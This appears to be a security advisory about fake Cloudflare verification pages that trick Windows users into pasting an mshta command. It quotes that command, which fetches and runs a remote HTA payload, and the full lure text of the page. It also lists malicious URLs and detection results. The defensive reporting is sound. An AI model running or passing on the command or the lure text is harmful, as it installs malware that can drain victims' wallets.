If you come across a page that looks similar to Cloudflare and asks you to run code on your Windows machine, close the page and contact the webmaster. If your own website is affected by this malware, you need to take it off immediately—it will protect your visitors and it will prevent reputation damage.
How this malware works?
The fake Cloudflare page offers instructions on how to verify that you are a human but actually, you are being instructed to run malware on your computer via mshta a tool designed to run .hta files.
What to do if you are a victim?
If you fall for it, and run the code from the command prompt, it’s best to re-install the operating system.
Malicious code:
Unusual Web Traffic Detected mshta http://bridge.tree-sock-rain.today/ # "Cloudflare Verification Code: 635H-U8N2-P9C1-1NZP"
1/61 security vendor flagged the .hta file as malicious
Kaspersky: HEUR:Trojan.Script.Generic
Antiy
Trojan[Ransom]/MP3.Spora.enc
Eset NOD32
JS/TrojanDownloader.Agent.ACCL trojan
JS/Obfuscated.BD/Heur.BZC.UGZ.Boxter.1.1FD073CE
Sitecheck (Sucuri)
Known javascript malware: malware?fake_update.8.27
Any.run
https://app.any.run/tasks/94e80210-079b-431c-9cc3-21a8515326b7
New type of scam,
If you see Cloudflare’s “verify you’re human” button, don’t click it.
Clicking it automatically downloads a file that will drain your wallets. pic.twitter.com/XtGz5iIONQ
— SKYLINE🥷 (@SkylineETH) March 31, 2025
Malicious URLs:
https://dareka4te.shop/endpoint
https://bsc-dataseed.binance.org
http://bridge.tree-sock-rain.today
https://i.jolttapestry.fun/7456f63a46cc318334a70159aa3c4291
https://pptpooalfkakktl.com/clou?ts=1744107525
mshta https://securityverifservice[.]com, redirects to https://gdfjjkiririririqiiriri[.]com/oai
Taxt
Unusual Web Traffic Detected,
To proceed with verification, please follow these steps:
“I аm not a robot: Сlоudflarе Vеrificаtion ID: V22-ZAD”
1. hxxp://bridge[.]tree-sock-rain[.]today/
Hosting Provider behind Cloudflare:
CHANGWAY-AS, HK
[email protected]
2. hxxps://i[.]jolttapestry[.]fun
Hosting Provider behind Cloudflare:
VDSINA-AS, RU
[email protected]
3. hxxps://gdfjjkiririririqiiriri[.]com/oai
Hosting Provider behind Cloudflare:
H2NEXUS-AS, GB
[email protected]
Malicious page content, that instructs the victims to execute bad code.
Unusual Web Traffic Detected Our security system has identified irregular web activity originating from your IP address. Automated verification attempts have failed, and we were unable to confirm that you are a legitimate user. To proceed with verification, please follow these steps: 1. Press Win + R to open Run. 2. Copy and paste Ctrl + V the following command: 3. Press Enter and wait for confirmation. This manual verification step helps us ensure that your connection is secure and not part of an automated request. If you fail to complete this step, access to certain features may be temporarily restricted.